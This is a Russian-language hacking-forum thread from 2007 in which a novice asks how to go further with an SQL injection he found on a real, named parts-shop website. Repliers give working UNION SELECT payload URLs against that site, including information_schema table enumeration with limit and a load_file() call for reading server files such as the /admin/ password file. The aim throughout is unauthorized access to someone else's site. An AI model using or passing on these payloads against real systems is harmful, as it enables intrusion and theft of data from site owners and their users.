Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Глупый вопрос по sql-inj. |

15.12.2007, 21:22
|
|
Новичок
Регистрация: 07.07.2007
Сообщений: 7
Провел на форуме: 60698
Репутация:
1
|
|
Глупый вопрос по sql-inj.
Здравствуйте!
Нашел на одном сайте sql-inj, удалось подобрать столбцы, повытаскивать инфу:
user()
database()
version()
Сама уязвимость выглядит вот так:
index.php?table=288&id=-1+union+select+1,2,3,4,5,6,7/*
Подскажите пожалуйста, что делать дальше? Знаю, сейчас наверно многе будут тыкать носом в статьи по sql-inj, но во всех статьях написано "подбор таблиц" или что-то подобное, что в данном случае мало пригодно, если честно... Сайт достаточно простой, регистрации пользователей нету, какой смысл тогда пытаться подобрать таблицы? Еще есть очень интересный каталог /admin/ при заходе в который выскакивает табличка Введите имя пользователя и пароль для "set pass", если ткнуть отмену, то кидает на стандартную страничку Authorization Required. Думаю, что пароль к каталогу /admin/ лежит в каком-то файле на сервере, а не хранится в БД, как попытаться достать этот файл с помощью sql-inj? Функцией load_file? Но как ей праильно пользоваться и как начать подбирать путь?
Заранее очень большое спасибо всем ответившим.
П.С. Не пинайте сильно, если некоторые моменты попросту глупы, я еще только учусь. 
|
|
|

15.12.2007, 21:34
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме: 5151669
Репутация:
1198
|
|
Последний раз редактировалось Sn@k3; 15.12.2007 в 21:34..
Причина: непрально url написал
|
|
|

15.12.2007, 21:34
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме: 1896022
Репутация:
259
|
|
Если версия мускула 5, то через from+information_schema.tables/* перебераешь таблицы, смотришь что интересного...
|
|
|

15.12.2007, 21:37
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
index.php?table=288&id=-1+union+select+load_file('путь к файлу'),2,3,4,5,6,7/*
В разделе статьи есть статья от Кэша про раскрытие пути, почитай
|
|
|

15.12.2007, 21:45
|
|
Новичок
Регистрация: 07.07.2007
Сообщений: 7
Провел на форуме: 60698
Репутация:
1
|
|
Сообщение от min7
Если версия мускула 5, то через from+information_schema.tables/* перебераешь таблицы, смотришь что интересного...
Версия 5.0.45-log
Но если попробовать запрос:
index.php?table=288&id=-1+union+select+from+information_schema.tables/*
или
http://center-zapchast.ru/index.php?table=288&id=-1+union+select+1,2,3,information_schema.tables,5,6 ,7/*
то к сожалению ничего не происходит..  Может я как-то не так запросы формирую? Подскажите, пожалуйста.
|
|
|

15.12.2007, 21:49
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме: 1896022
Репутация:
259
|
|
Конечно не так, надо http://center-zapchast.ru/index.php?table=288&id=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables/*
потом через limit перебераешь.
|
|
|

15.12.2007, 21:53
|
|
Новичок
Регистрация: 07.07.2007
Сообщений: 7
Провел на форуме: 60698
Репутация:
1
|
|
Сообщение от min7
Конечно не так, надо http://center-zapchast.ru/index.php?table=288&id=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables/*
потом через limit перебераешь.
Спасибо конечно, но что мне даст "CHARACTER_SETS"? 
И что делать с лимитом?
|
|
|

15.12.2007, 21:59
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме: 1896022
Репутация:
259
|
|
в конец запроса ставишь +limit+N,1/*
где N цифра, то есть ты подставляешь вместо N 1 потом 2 и тд...А вообще почитай уроки, ведь описывали уже всё по сто раз.
https://forum.antichat.ru/thread19605.html
http://forum.antichat.ru/thread43966.html
|
|
|

15.12.2007, 22:02
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме: 4778940
Репутация:
1257
|
|
автор извини но судя по твоим вопросам - иди прочитай статьи!
|
|
|

15.12.2007, 22:21
|
|
Новичок
Регистрация: 07.07.2007
Сообщений: 7
Провел на форуме: 60698
Репутация:
1
|
|
Сообщение от min7
https://forum.antichat.ru/thread19605.html
http://forum.antichat.ru/thread43966.html
Спасибо за ссылки!
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|